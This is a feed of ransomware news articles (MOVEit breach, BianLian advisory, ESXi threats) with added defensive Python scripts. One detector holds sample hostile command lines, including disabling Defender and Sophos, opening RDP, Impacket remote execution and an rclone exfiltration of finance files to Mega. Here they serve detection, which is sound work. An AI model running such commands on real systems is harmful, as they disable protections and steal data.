ransomware Archives - My TechDecisions
https://mytechdecisions.com/tag/ransomware/
The end user’s first and last stop for making technology decisions
Feed last built: Tue, 20 Feb 2024 20:15:15 +0000

Rising Ransomware, Supply Chain Disruptions & Geopolitical Issues Complicate Cybersecurity
https://mytechdecisions.com/it-infrastructure/txone-networks-research-ransomware-supply-chain-geopolitical-issues-complicate-cybersecurity/
Tue, 20 Feb 2024 20:15:15 +0000

The post Rising Ransomware, Supply Chain Disruptions & Geopolitical Issues Complicate Cybersecurity appeared first on My TechDecisions.

Cyber-physical systems security provider TXOne Networks recently published its 2023 annual report detailing a growing range of cybersecurity issues facing global industries.

The Crisis of Convergence: OT/ICS Cybersecurity 2023, which is available for free download, “details diverse intensifying challenges, including growth in attacks via Ransomware-as-a-Service (RaaS) models, exploitation of supply chain vulnerabilities and prevalence of state-sponsored hackers and other politically motivated actors in the wake of geopolitical issues,” according to the company announcement.

TXOne Networks surveyed 405 key information technology (IT) and operational technology (OT) security decision-makers from across multiple global markets and sectors including automotive, pharmaceuticals and biotechnology, chemical, general manufacturing, oil and gas and transportation in September 2023.

The Crisis of Convergence: OT/ICS Cybersecurity 2023 “distills the survey findings, alongside extensive TXOne Networks threat research from 545 cybersecurity incidents around the world in 2023,” according to the company announcement.

“The threat landscape has intensified significantly in the industrial manufacturing and critical infrastructure sectors, leading to destructive events, economic losses, and potential risks to human safety,” reads the TXOne Networks report, which was produced in collaboration with Frost & Sullivan.

“Organizations emphasize the protection of critical OT assets as a top priority, with data security being a key investment area within their OT security budget allocations,” the report says. “Organizations are also seeking to invest in strengthening the resilience of their technological infrastructure and are turning to innovative approaches like Cyber-Physical Systems Detection and Response (CPSDR), which integrates OT expertise across various domains.

“This enhances OT security posture and resilience against evolving threats, enabling organizations to better protect their operations and ensure resilience in the face of a constantly changing threat environment,” according to the report.

More About the TXOne Networks Cybersecurity Report

The Crisis of Convergence: OT/ICS Cybersecurity 2023 explores a range of topics relevant to contemporary OT/ICS cybersecurity:

  • Ransomware threats
  • OT system maintenance and Information Technology (IT) integration concerns
  • Nation-state cyberattacks and implications
  • Dedicated teams for OT and Industrial Control System (ICS) security management
  • OT/ICS cybersecurity investment
  • New regulations and standards propelling OT/ICS defense
  • Supply-chain integrity

“The Crisis of Convergence: OT/ICS Cybersecurity 2023 is the result of thorough research and technical analysis that is aimed at delivering up-to-date insights into the global threat landscape and the tactics that malicious actors employ to launch attacks,” says Terence Liu, chief executive officer (CEO) of TXOne Networks, in the announcement.

“The findings are clear,” he says. “Organizations must move well beyond regulatory compliance in their OT/ICS cybersecurity strategies if they are to successfully adapt for the constantly evolving threat.

“Safeguarding the availability, reliability and security of revenue-generating operations will depend on new governance structures, enhanced team and technical capabilities, integration of advanced threat detection and response into cybersecurity frameworks and risk management across the supply chain,” says Liu.


Another version of this article originally appeared on our sister site Security Sales & Integration on February 16, 2024. It has since been updated for My TechDecisions’ audience.

Nearly 900 Schools Impacted by National Student Clearinghouse Data Breach
https://mytechdecisions.com/network-security/nearly-900-schools-impacted-by-national-student-clearinghouse-data-breach/
Tue, 26 Sep 2023 19:39:30 +0000

The National Student Clearinghouse (NSC) revealed a recent data breach impacted 890 schools that use its services.

A breach notification letter filed with the Office of the California Attorney General said the Cl0p ransomware gang gained access to its MOVEit managed file transfer (MFT) server on May 30 and stole files containing personally identifiable information (PII).

The Clearinghouse is a nonprofit that provides educational reporting, data exchange, verification and research services to approximately 22,000 high schools and 3,600 colleges and universities, which together account for roughly 97% of students in public and private institutions, according to Bleeping Computer.

“On May 31, 2023, the Clearinghouse was informed by our third-party software provider, Progress Software, of a cybersecurity issue involving the provider’s MOVEit Transfer solution,” NSC wrote in the letter. “After learning of the issue, we promptly initiated an investigation with the support of leading cybersecurity experts. We have also coordinated with law enforcement.”

The stolen PII contained names, birth dates, contact information, Social Security numbers, student ID numbers and other school-related records. NSC said it has implemented patches to the MOVEit software and additional monitoring measures to further protect its systems and customers’ data. It is also offering identity monitoring services at no cost for two years.

In late May, the Cl0p ransomware gang began exploiting a then-unpatched (zero-day) SQL injection vulnerability in the MOVEit Transfer platform, later assigned CVE-2023-34362, to gain access to the underlying database, reports Help Net Security. Starting June 15, the cybercriminals began extorting organizations that fell victim to the attacks, exposing their names on the gang’s dark web data leak site.

In late June, NSC notified the impacted schools about the breach but did not provide many details as the investigation was ongoing. At that time, Databreachnet.com reported that NSC’s name had been removed from Cl0p’s leak site, “which is often an indication that a victim paid.”

The breach has affected many organizations across the globe, including governments, financial institutions, pension systems, and other public and private entities. Among the victims are multiple U.S. federal agencies and two U.S. Department of Energy entities.

Coveware, a cyber extortion incident response firm, estimates the gang will collect around $75-100 million in payment due to high ransom requests.

Another version of this article originally appeared on our sister site Campus Safety on September 25, 2023. It has since been updated for My TechDecisions’ audience.

Progress Software Urges Further Action to Prevent MOVEit Exploitation
https://mytechdecisions.com/network-security/progress-software-urges-further-action-to-prevent-moveit-exploitation/
Fri, 16 Jun 2023 15:11:00 +0000

The MOVEit Transfer story continues to plague IT departments and security professionals as Progress Software has issued another advisory, urging organizations to apply yet another patch to address a privilege escalation flaw in its Transfer product.

The company’s update comes amid reports of widespread exploitation, including at several U.S. agencies that were breached as part of the campaign. Cybersecurity researchers say ransomware groups have seized upon the vulnerability and are using it to exfiltrate data in order to compel victim organizations to pay.

In the advisory, dated June 16, Progress says it has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment.

“If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment,” the company says in the new advisory. “In Progress MOVEit Transfer versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an un-authenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content.”

The incident, which was first identified in late May, now stretches well into June as organizations rush to patch their systems and protect their environment.

According to Progress Software, “All MOVEit Transfer customers must take action and apply the patch to address the June 15th CVE-2023-35708 vulnerability discovered in MOVEit Transfer.”

However, organizations have two paths to take, depending on if they applied the remediation and patching steps from the first MOVEit Transfer Critical Vulnerability (May 2023) advisory prior to June 15.

Organizations that have not yet applied the May 2023 patch should do so and follow its remediation steps immediately, the company says. That patch covers two separate vulnerabilities: the original flaw disclosed May 31 (CVE-2023-34362) and a second one identified on June 9 (CVE-2023-35036).

Once that is taken care of, organizations should apply the June 15 patch (CVE-2023-35708).

If organizations have applied the May 31 and June 9 patch, they should now apply the June 15 patch, which will bring them fully up to date.
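As an added illustration (not Progress Software’s tooling, and not part of the advisory itself), the following Python script applies the fixed-build thresholds quoted above to an inventory of MOVEit Transfer hosts. The inventory lines and hostnames are constructed, and the script assumes hosts report their build either in the internal form (15.0.2) or the marketing form (2023.0.2), both of which the advisory uses:

```python
"""Triage MOVEit Transfer builds against the fixed versions in the June 16 advisory.

Added example, not Progress Software's tooling. The fixed-build thresholds are the
ones the advisory quoted above lists for CVE-2023-35708; the inventory lines and
hostnames below are constructed, and the assumption that a host reports its build
as 'major.minor.patch' (15.0.2) or in the marketing form (2023.0.2) is ours.
"""

# Marketing year -> internal major version, as given in the advisory text.
YEAR_TO_MAJOR = {2021: 13, 2022: 14, 2023: 15}

# First fixed build on each branch; anything earlier on that branch is vulnerable.
FIXED_BUILDS = {
    (13, 0): (13, 0, 8),  # 2021.0.8
    (13, 1): (13, 1, 6),  # 2021.1.6
    (14, 0): (14, 0, 6),  # 2022.0.6
    (14, 1): (14, 1, 7),  # 2022.1.7
    (15, 0): (15, 0, 3),  # 2023.0.3
}


def parse_build(version: str) -> tuple:
    """Turn '15.0.2' or '2023.0.2' into a comparable (major, minor, patch) tuple."""
    parts = version.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised build string: {version!r}")
    major, minor, patch = (int(p) for p in parts)
    major = YEAR_TO_MAJOR.get(major, major)  # normalise 2023.x.y to 15.x.y
    return (major, minor, patch)


def assess(version: str) -> str:
    """Return 'patched', 'vulnerable', 'unsupported-branch' or 'unparseable'."""
    try:
        build = parse_build(version)
    except ValueError:
        return "unparseable"
    fixed = FIXED_BUILDS.get(build[:2])
    if fixed is None:
        # Branches the advisory does not list (e.g. 12.x) got no fix here:
        # treat them as needing an upgrade, never as safe.
        return "unsupported-branch"
    return "patched" if build >= fixed else "vulnerable"


def triage(inventory: str) -> dict:
    """Map each 'hostname,build' line of an inventory to its assessment."""
    results = {}
    for line in inventory.strip().splitlines():
        host, _, version = line.partition(",")
        results[host.strip()] = assess(version)
    return results


# Constructed inventory: hostnames and builds are made up for the example.
SAMPLE_INVENTORY = """
mft-prod-01,15.0.2
mft-prod-02,2023.0.3
mft-dr-01,14.1.7
mft-legacy-01,13.0.7
mft-legacy-02,12.1.9
mft-unknown,n/a
"""

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:15s} {status}")
```

Anything reported as unsupported-branch or unparseable should be treated as needing action, not as clean; an inventory script that silently skips unfamiliar versions is exactly how a forgotten 12.x host stays exposed.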

There is a lot of information coming out about these bugs, but cybersecurity firm Rapid7 has a detailed timeline of events, up until this new information.

May 27-28: Rapid7 services teams have so far confirmed indicators of compromise and data exfiltration dating back to at least May 27 and May 28, 2023 (respectively).

May 31: Progress Software publishes an advisory on a critical SQL injection vulnerability in their MOVEit Transfer solution.

May 31: Rapid7 begins investigating exploitation of MOVEit Transfer.

June 1: Rapid7 publishes initial analysis of MOVEit Transfer attacks after responding to incidents across multiple customer environments.

June 1: The security community publishes technical details and indicators of compromise.

June 1: Compromises continue; Rapid7 responds to alerts.

June 1: CISA publishes Security Advisory.

June 2: CVE-2023-34362 is assigned to the zero-day vulnerability.

June 2: Mandiant attributes the attack to a threat cluster with unknown motives.

June 2: Velociraptor releases an artifact to detect exploitation of MOVEit File Transfer critical vulnerability.

June 4: Rapid7 publishes a method to identify which data was stolen.

June 4: Nova Scotian government discloses it is investigating privacy breach.

June 5: Microsoft attributes the attack to Lace Tempest, a Cl0p ransomware affiliate that has previously exploited vulnerabilities in other file transfer solutions (e.g., Accellion FTA, Fortra GoAnywhere MFT).

June 5: UK companies BA, BBC, and Boots disclose breaches as victims in MOVEit File Transfer.

June 5: Cl0p ransomware group claims responsibility for the zero-day attack.

June 6: Security firm Huntress releases a video allegedly reproducing the exploit chain.

June 6: The Cl0p ransomware group posts a communication on their leak site demanding that victim organizations contact them by June 14 to negotiate extortion fees in exchange for the deletion of stolen data.

June 7: CISA publishes #StopRansomware Cybersecurity Advisory regarding MOVEit File Transfer Vulnerability CVE-2023-34362.

June 9: Progress Software updates advisory to include a patch for a second MOVEit Transfer Vulnerability, which was uncovered by Huntress during a third-party code review. The vulnerability is later assigned CVE-2023-35036.

June 12: Rapid7 releases a full exploit chain for MOVEit Transfer Vulnerability CVE-2023-34362.

Organizations impacted should consult Progress Software, their cybersecurity services provider, and CISA for more information.

Zerto Launches Zerto 10 for Enhanced Disaster Recovery, Ransomware Mitigation
https://mytechdecisions.com/it-infrastructure/zerto-10-disaster-recovery-ransomware-mitigation/
Thu, 18 May 2023 16:55:58 +0000

Disaster recovery and ransomware resilience firm Zerto is launching Zerto 10 for Microsoft Azure, a new disaster recovery solution designed to enhance disaster recovery and mobility for complete infrastructure flexibility. The company also unveiled new real-time encryption and detection features and a new air-gapped recovery vault to help mitigate a ransomware attack.

According to the company, Zerto 10 offers a new replication architecture for scale-out efficiency and native protection of Azure Virtual Machines. In addition, it provides new support for multi-disk consistency for VMs in Microsoft Azure to help protect data both to and from Azure as well as across Azure regions within the cloud, the company says.

The company says Zerto 10 coordinates replication across all the virtual disks associated with a virtual machine in Azure to maintain data consistency for failover and recovery. The new cloud-based architecture is designed to enable easier scale out to “thousands of VMs,” reduce management complexity and enable data movers to scale out or back based on I/O levels between production and disaster recovery to, from or within Azure.

Specifically, Zerto 10 includes a new tool for ransomware resilience and real-time detection of encryption, which monitors and reports on encryption as data streams in and can detect anomalous activity “within minutes” to alert users of suspicious activity.

According to the company, a new Zerto Cyber Resilience Vault is an air-gapped recovery vault designed to bring another layer of security with a real-time early warning system built on three pillars: replicate and detect, isolate and lock, and test and recover.

According to Zerto, combined with the vault’s zero trust architecture, the pillars enable rapid air-gapped recovery in a highly secure environment, allowing enterprises to architect and customize a recovery vault to help mitigate ransomware attacks.

Zerto 10 also introduces a Linux-based Zerto Virtual Manager Appliance, which replaces the legacy Windows-based Virtual Manager and is designed to be easier to deploy, secure and maintain as part of regular Zerto product updates. Customers upgrading from legacy ZVMs will have their existing settings migrated to the new appliance, the company says.

Zerto for Microsoft Azure will be available in the Azure Marketplace in July.

BianLian Ransomware Group Skips Encryption and Goes Straight to Exfiltration
https://mytechdecisions.com/network-security/bianlian-ransomware-group-skips-encryption-exfiltration/
Wed, 17 May 2023 15:24:44 +0000

CISA, the FBI, Microsoft and Sophos are warning organizations to limit their use of certain legitimate tools, which are being leveraged by the BianLian group, a ransomware group that has targeted organizations with a data extortion model that bypasses the need to encrypt victims’ data.

According to a joint advisory from CISA, its Australian counterpart agency and the FBI, with input from Microsoft and Sophos, the BianLian group is a ransomware developer, deployer and data extortion group that has been active since June 2022. The group originally used a double-extortion model in which it encrypted systems after exfiltrating data, but since January 2023 it has shifted to largely exfiltration-based extortion, meaning it bypasses encryption and uses the threat of leaking sensitive data to compel victims to pay the ransom.

How the BianLian Ransomware group gains initial access and evades detection

According to the advisory, the group leverages legitimate IT tools to gain access and steal data, including Remote Desktop Protocol credentials, open-source tools and command-line scripting for discovery and credential harvesting, and data exfiltration via File Transfer Protocol (FTP), Rclone or Mega.

However, initial access is gained by leveraging compromised Remote Desktop Protocol credentials, which officials say are likely acquired from initial access brokers or phishing.

To evade detection, the BianLian ransomware group uses PowerShell and Windows Command Shell to disable Windows Defender and to bypass the Anti-Malware Scan Interface (AMSI). In addition, the group modifies the Windows Registry to disable tamper protection for the Sophos SAVEnabled, SEDEnabled and SAVService services, which lets it uninstall those services.

How the BianLian Ransomware group learns about the victim’s environment

For discovery and learning about the victim’s environment, the BianLian group actors employ a variety of tools, including native Windows tools and Windows Command Shell, to get an overview of the victim’s environment.

To scan the network for open ports and ping computers, the group uses Advanced Port Scanner and SoftPerfect Network Scanner.

The group also uses SharpShares to enumerate accessible network shares in a domain and PingCastle to enumerate Active Directory and provide a map to visualize the hierarchy of trust relationships, according to the advisory.

Meanwhile, native Windows tools and Windows Command Shell are used to query logged-in users and query the domain to identify all groups, accounts in the Domain Admins and Domain Computers groups, and all users in the domain. In addition, the tools are used to retrieve a list of all domain controllers and domain trusts and identify accessible devices on the network, according to the advisory.

Read Next: Creating a Ransomware Response Plan

How BianLian Ransomware group obtains credentials and moves laterally

To move laterally through the network and conduct further malicious activity, the BianLian group uses valid accounts, obtaining the credentials in several ways: using Windows Command Shell to find unsecured credentials on the local machine, harvesting credentials from Local Security Authority Subsystem Service (LSASS) memory, using RDP Recognizer to brute-force RDP passwords or check for vulnerabilities, and accessing the Active Directory domain database.

In one case, BianLian ransomware actors were observed using a portable executable version of an Impacket tool to move laterally to a domain controller and harvest credential hashes, authorities say.

Through Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network. This allows threat actors to run portable executable files on victim systems using local user rights, but only if the executable is not blocked.

BianLian group actors use PsExec and RDP with valid accounts for lateral movement, the advisory states. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic.

In one case, the FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller, authorities say.

BianLian Ransomware group’s collection and exfiltration

According to the advisory, the BianLian ransomware group has been observed using malware that enumerates registry and files and copies clipboard data from users.

The group searches for sensitive files using PowerShell scripts and exfiltrates them for data extortion, which is a departure from the group’s previous activity of encrypting files before extortion attempts.

The BianLian group uses FTP and Rclone, a tool for syncing files to cloud storage, to exfiltrate data. The group has been observed installing Rclone and other files in generic, rarely inspected folders, as well as using the Mega file-sharing service to exfiltrate victim data.

According to a ransom note, BianLian group specifically looks for financial, client, business technical and personal files.

If a victim refuses to pay, the group threatens to publish exfiltrated data to a leak website on the Tor network. The ransom note directs victims to a Tox ID and a Tox chat or email address to communicate with the attackers.

The group communicates in a variety of ways, including printing a ransom note to printers on the compromised network.

How to Protect Against a BianLian Ransomware attack

In addition to typical ransomware mitigations, organizations are urged to limit the use of RDP and other remote desktop services, disable command-line and scripting activities and permissions, restrict the use of PowerShell, and update Windows PowerShell or PowerShell Core to the latest version.
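The behaviours described in the sections above map fairly directly onto process-creation telemetry. As an added example (not part of the CISA advisory or this article), the Python below runs a small set of rules over constructed Windows process-creation events in a “timestamp|host|user|parent|command_line” layout and then correlates hits per host, so that one machine showing several stages (Defender off, Sophos registry edit, RDP opened) stands out from a single noisy match. Hostnames, users and the Sophos registry path are made up; the patterns are starting points to tune against your own telemetry, not a complete signature set.

```python
"""Flag BianLian-style tradecraft in Windows process-creation events.

Added example, not from CISA's advisory or the article. The rules encode the
behaviours described above (Defender and AMSI tampering, Sophos tamper-protection
registry edits, RDP enablement, LSASS dumping, Impacket/PsExec remote execution,
Rclone exfiltration). Event lines are constructed in a simple
'timestamp|host|user|parent|command_line' shape; hostnames, users and the
registry path are made up.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    behaviour: str
    pattern: "re.Pattern"


RULES = [
    Rule("defender-disable", "PowerShell used to switch off Windows Defender features",
         re.compile(r"Set-MpPreference\s.*-Disable\w+", re.I)),
    Rule("amsi-bypass", "tampering with the Anti-Malware Scan Interface",
         re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", re.I)),
    Rule("sophos-tamper", "registry edit to Sophos tamper-protection values",
         re.compile(r"(reg(\.exe)?\s+add|Set-ItemProperty).*(SAVEnabled|SEDEnabled|SAVService)", re.I)),
    Rule("rdp-enable", "account added to Remote Desktop Users or RDP opened in the firewall",
         re.compile(r'net1?\s+localgroup\s+"?Remote Desktop Users"?.*/add'
                    r"|advfirewall\s+firewall\s+add\s+rule.*localport=3389"
                    r"|fDenyTSConnections.*/d\s+0", re.I)),
    Rule("lsass-dump", "credential harvesting from LSASS memory",
         re.compile(r"procdump.*lsass|comsvcs(\.dll)?[ ,]+MiniDump", re.I)),
    Rule("remote-exec", "Impacket or PsExec style remote execution",
         re.compile(r"\b(wmiexec|smbexec|atexec|secretsdump|psexec)(\.py|\.exe)?\b", re.I)),
    Rule("rclone-exfil", "Rclone copy/sync to cloud storage such as Mega",
         re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    user: str
    rule: str
    command: str


def scan(events: str) -> list:
    """Return one Finding per (event, rule) match, in event order."""
    findings = []
    for line in events.strip().splitlines():
        fields = line.split("|", 4)  # maxsplit keeps pipes inside the command line
        if len(fields) != 5:
            continue  # malformed line: skip rather than crash the pipeline
        ts, host, user, _parent, cmd = fields
        for rule in RULES:
            if rule.pattern.search(cmd):
                findings.append(Finding(ts, host, user, rule.name, cmd))
    return findings


def correlate(findings: list, min_rules: int = 2) -> dict:
    """Hosts on which at least `min_rules` distinct behaviours fired.

    One hit is noise; several different stages on one machine is the
    hands-on-keyboard sequence the advisory describes."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return {h: sorted(r) for h, r in by_host.items() if len(r) >= min_rules}


# Constructed events; the Sophos registry path is illustrative only.
SAMPLE_EVENTS = r"""
2023-05-02T03:14:07Z|WS-FIN-12|CORP\jdoe|explorer.exe|"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n
2023-05-02T03:15:22Z|WS-FIN-12|CORP\jdoe|cmd.exe|powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true
2023-05-02T03:15:40Z|WS-FIN-12|CORP\jdoe|cmd.exe|reg add "HKLM\SYSTEM\CurrentControlSet\Services\SAVService" /v Start /t REG_DWORD /d 4 /f
2023-05-02T03:16:05Z|WS-FIN-12|CORP\jdoe|cmd.exe|net localgroup "Remote Desktop Users" svc_backup /add
2023-05-02T03:16:09Z|WS-FIN-12|CORP\jdoe|cmd.exe|netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
2023-05-02T03:20:31Z|DC01|CORP\svc_backup|cmd.exe|wmiexec.py corp/svc_backup@10.0.0.5 whoami
2023-05-02T04:02:11Z|FS01|CORP\svc_backup|cmd.exe|C:\ProgramData\rclone.exe copy E:\Finance mega:backup --transfers 32
2023-05-02T04:10:00Z|WS-HR-03|CORP\asmith|explorer.exe|C:\Windows\System32\notepad.exe
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.timestamp} {f.host:10s} {f.rule:17s} {f.command[:60]}")
    print("hosts with multi-stage activity:", correlate(hits))
```

The per-host correlation is the part worth keeping even if you swap the rules for your EDR vendor’s: the advisory’s sequence (disable the AV, open RDP, move to the domain controller, stage Rclone) is what distinguishes an intrusion from an administrator running one of these commands legitimately.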

Read the advisory for more information, including the full list of recommendations and indicators of compromise.

CrowdStrike: VMware ESXi in the RaaS Crosshairs
https://mytechdecisions.com/network-security/crowdstrike-vmware-esxi-raas-crosshairs/
Mon, 15 May 2023 17:47:53 +0000

Cyberattacks are continuing to target VMware ESXi vSphere hypervisors, with cybersecurity firm CrowdStrike reporting today that ransomware-as-a-service (RaaS) platforms are increasingly being leveraged to deploy Linux versions of ransomware tools.

According to the cybersecurity giant, these tools are specifically designed to affect VMware’s ESXi vSphere hypervisor. The company’s research into this kind of attack dates back to February 2021, when CrowdStrike began what is now a three-part blog series on the trend, which it says is continuing in 2023.

The company says RaaS platforms such as Alphv, Lockbit and Defray are being leveraged in attacks against ESXi, which CrowdStrike says does not support third-party agents or antivirus software.

“This, combined with the popularity of ESXi as a widespread and popular virtualization and management system, makes the hypervisor a highly attractive target for modern adversaries,” write CrowdStrike researchers in a new blog.

These attacks on ESXi servers have even led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue several warnings and, in February, to release a recovery guide and script designed to help organizations recover from the ESXiArgs ransomware attacks.

CrowdStrike cites several vulnerabilities that have been exploited in the wild in the last few years, including:

  • CVE-2020-3992 – an ESXi OpenSLP remote code execution vulnerability resulting from a use-after-free issue.
  • CVE-2021-21974 – an ESXi OpenSLP heap-overflow vulnerability that could result in remote code execution.
  • CVE-2019-5544 – an ESXi OpenSLP heap overwrite vulnerability.
  • CVE-2021-44228 (Log4Shell) – a remote code execution vulnerability in Log4j that has been used to compromise VMware Horizon instances.
  • CVE-2016-7463, CVE-2017-4940 and CVE-2020-3955 – cross-site scripting vulnerabilities used for privilege escalation.
  • CVE-2021-22043 – a privilege escalation vulnerability.

New threats against VMware ESXi security

Due to VMware’s prominence in IT infrastructure, ESXi servers remain an attractive target, with a growing number of threat actors leveraging these vulnerabilities in their attacks. Recently, CrowdStrike identified a new RaaS program that provides affiliates with ransomware binaries targeting Windows and ESXi/Linux systems, researchers write.

In addition, CrowdStrike and other researchers have identified many other new groups and attack methods targeting ESXi over the past few years. Targeting virtual infrastructure gives attackers several advantages, including multiplying the impact of a single compromise and subverting detection and prevention mechanisms, since the targeted components are often not sufficiently protected by security solutions.

“Because VMware products have been subject to critical vulnerabilities in the past, adversaries will likely continue to target any potential weaknesses, as successful compromises typically provide access to high-value resources,” CrowdStrike researchers write.

CrowdStrike says organizations should be aware of two main attack vectors when it comes to VMware ESXi servers: credential theft and virtual machine access.

Researchers call credential theft the “most straightforward attack vector against an ESXi hypervisor.” Following credential theft, an adversary can simply authenticate against the server to advance the attack based on their goal. With sufficient privileges to enable and access the SSH console, attackers can execute arbitrary code directly, even on the most recent ESXi versions.

If a VM can be accessed directly, CrowdStrike says, poor segregation from the rest of the internal network can lead to the VM facilitating lateral movement, which gives attackers more flexibility in choosing a vulnerable system. A properly segregated VM, however, requires an attacker to target the ESXi hypervisor directly and run code at the hypervisor level via a VM escape exploit. This is a complicated process, and most adversaries lack the capability to do so, researchers say.

How to secure VMware ESXi

To protect VMware hypervisors, CrowdStrike urges organizations to:

  • Avoid direct access to ESXi hosts. It is recommended to use the vSphere Client to administer ESXi hosts managed by a vCenter Server. Direct access to managed hosts using the VMware Host Client or changing hosts from the Direct Console User Interface (DCUI) should be avoided.
  • Use a hardened jump server with multifactor authentication (MFA). If direct access to an ESXi host is necessary, it should be limited to a jump server with MFA enabled. The jump server should be dedicated to administrative or privileged purposes, have full auditing capabilities, and restrict SSH, Web UI, and API access to ESXi or vCenter only from the jump server. SSH access should be disabled, and any attempt to enable it should trigger alerts and be investigated urgently.
  • Not expose vCenter to the internet over SSH or HTTP. Adversaries have been observed gaining access to vCenter by exploiting vulnerabilities or using valid accounts. To mitigate this risk, vCenter services should not be exposed to the internet.
  • Regularly back up ESXi datastore volumes. It is essential to back up virtual machine disk images and snapshots stored in ESXi datastores on a daily basis, or more frequently if possible. Backups should be stored offsite to enable system restoration during a ransomware event, while ensuring the backups themselves are not compromised.
  • Consider physical disconnection of storage or power to ESXi host during encryption. In situations where encryption is suspected or known to be in progress and access to kill malicious processes is not possible, physically disconnecting the storage from the ESXi host or cutting power to the host can be an option. This can prevent ransomware from continuing to encrypt virtual machine disk files (VMDKs). Shutting down guest VMs will not help as the encryption occurs on the hypervisor itself. However, it’s important to note that physical disconnection may cause potential issues or data loss if data has not been written to backend storage.
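A detection check for the "any attempt to enable SSH should trigger alerts" item above, added here as an example and not CrowdStrike's or VMware's code: it scans syslog-forwarded ESXi vobd.log records for the esx.audit.ssh.enabled, esx.audit.shell.enabled and esx.audit.dcui.enabled audit events and reports hosts whose SSH service was enabled and never disabled again. The sample log lines are constructed, and the syslog prefix layout is an assumption to adapt to your collector.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# ESXi audit events (vobd VOB ids) raised when interactive access is switched on.
# Per the guidance above SSH should stay disabled, so every enable event is an alert.
ALERT_EVENTS = {
    "esx.audit.ssh.enabled": "SSH service enabled on ESXi host",
    "esx.audit.shell.enabled": "ESXi Shell enabled on ESXi host",
    "esx.audit.dcui.enabled": "DCUI enabled on ESXi host",
}

# Assumed layout for syslog-forwarded vobd records:
#   "<ts> <host> vobd: [<correlator>] <n>us: [<event>] <text>"
# Adjust the prefix to your collector; only the "[<event>]" token is relied on.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+vobd:\s+\[[^\]]+\]\s+\d+us:\s+"
    r"\[(?P<event>[^\]]+)\]\s*(?P<text>.*)$"
)

@dataclass(frozen=True)
class VobRecord:
    timestamp: str
    host: str
    event: str
    text: str

@dataclass(frozen=True)
class Alert:
    timestamp: str
    host: str
    event: str
    summary: str

def parse_line(line: str) -> Optional[VobRecord]:
    """Return the parsed vobd record, or None for lines from other daemons."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return VobRecord(m["ts"], m["host"], m["event"], m["text"])

def scan(lines: Iterable[str]) -> list[Alert]:
    """One alert per interactive-access enable event, in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec.event in ALERT_EVENTS:
            alerts.append(Alert(rec.timestamp, rec.host, rec.event, ALERT_EVENTS[rec.event]))
    return alerts

def hosts_with_ssh_still_enabled(lines: Iterable[str]) -> set[str]:
    """Hosts whose most recent SSH audit event is 'enabled': investigate these first."""
    state: dict[str, bool] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec.event == "esx.audit.ssh.enabled":
            state[rec.host] = True
        elif rec.event == "esx.audit.ssh.disabled":
            state[rec.host] = False
    return {host for host, enabled in state.items() if enabled}

# Constructed sample input: esx-01 re-disables SSH after a short window, esx-02 does not.
SAMPLE_LOG = """\
2023-02-21T10:14:02Z esx-01.lab.example vobd: [UserLevelCorrelator] 48212345us: [esx.audit.ssh.enabled] SSH access has been enabled.
2023-02-21T10:14:03Z esx-01.lab.example vobd: [UserLevelCorrelator] 48213345us: [esx.audit.shell.enabled] ESXi Shell has been enabled.
2023-02-21T10:20:40Z esx-01.lab.example vobd: [UserLevelCorrelator] 48610000us: [esx.audit.ssh.disabled] SSH access has been disabled.
2023-02-21T11:02:17Z esx-02.lab.example vobd: [UserLevelCorrelator] 91002000us: [esx.audit.ssh.enabled] SSH access has been enabled.
2023-02-21T11:02:18Z esx-02.lab.example vobd: [GenericCorrelator] 91003000us: [esx.audit.host.boot] Host has booted.
2023-02-21T11:02:19Z esx-02.lab.example hostd: [Originator@6876 sub=Vimsvc] unrelated hostd line
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for a in scan(lines):
        print(f"{a.timestamp} {a.host} {a.event}: {a.summary}")
    print("SSH still enabled on:", sorted(hosts_with_ssh_still_enabled(lines)))
```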

Read VMware’s ESXi security recommendations to learn more.

The post CrowdStrike: VMware ESXi in the RaaS Crosshairs appeared first on My TechDecisions.

Proofpoint Unveils New Innovations to Combat Increasingly Common Threats
https://mytechdecisions.com/network-security/proofpoint-unveils-new-innovations-to-combat-increasingly-common-threats/
Mon, 24 Apr 2023 17:51:43 +0000
Ahead of the 2023 RSA Conference, Proofpoint, Inc., the Sunnyvale, Calif.-based cybersecurity and compliance company, unveiled a host of innovations across its Aegis Threat Protection, Identity Threat Defense and Sigma Information Protection platforms. The company’s latest solutions empower organizations to stop malicious email attacks, detect and prevent identity-based threats and defend sensitive data from theft, loss and insider threats.

